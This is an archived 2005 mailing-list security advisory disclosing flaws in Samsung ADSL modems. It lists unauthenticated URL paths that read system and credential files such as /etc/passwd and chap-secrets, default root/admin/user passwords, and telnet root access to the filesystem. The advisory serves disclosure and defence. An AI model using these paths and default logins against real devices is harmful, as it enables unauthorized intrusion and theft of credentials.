lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: Samsung ADSL Modem Vulnerability

------------------------------------------------------------
     - EXPL-A-2005-002 exploitlabs.com Advisory 031 -
------------------------------------------------------------
                       - Samsung ADSL Modem -






AFFECTED PRODUCTS
=================
Samsung ADSL Modem

Samgsung Eletronics
http://www.samsung.com


DETAILS
=======
1. Arbitrary reading of files
2. Default root password
3. root file system access


Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory

http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note:
 This is a hardware based product with built in httpd for
 remote access, this is a seperate issue than the ones
 formaly presented above, but carry the same implications.


Identification:

HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html

Modem vendor Samsung Electronics (co) modem 
co chipset vendor b500545354430002 
cpe chipset vendor Samsung Electronics (co) cpe chipset 
software version  SMDK8947v1.2 Jul 11 2003 10:00:01 
ADSL DMT version a-110.030620-10130710


Samsung ADSL modems run uClinux OS
http://www.uclinux.com

note:
Depending on the implimentation, other products
using a combination of Boa / uClinux may be
affected as well.  


Item 1
=====
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/

http://[someSamsung.ip]/var/ppp/chap-secrets

http://[someSamsung.ip]/bin/sh

Any remote user may request any file present
in the router/modem OS file system.
Files can be fetched unauthenticated via a
GET request in a browser.


Item 2
=====
Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports

root/root
admin/admin
user/user


Item 3
======
By telneting to the device and loging in as
root/root, remote users my access the filesystem.
The modem provides 256mb of ram for OS and
file system operations. In this implimentation
there is aprox 120mb free file system space
which allows for the posibility for remote
attackers to use the file system for malicious
communication and file storage. This allows
many scenarios such as a storing worm and/or
viral code.

#echo "some bad data" >file



SOLUTION:
=========
none to date

Samsung has been contacted
No patch released



Credits
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

Donnie Werner

mail: morning_wood@...e-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ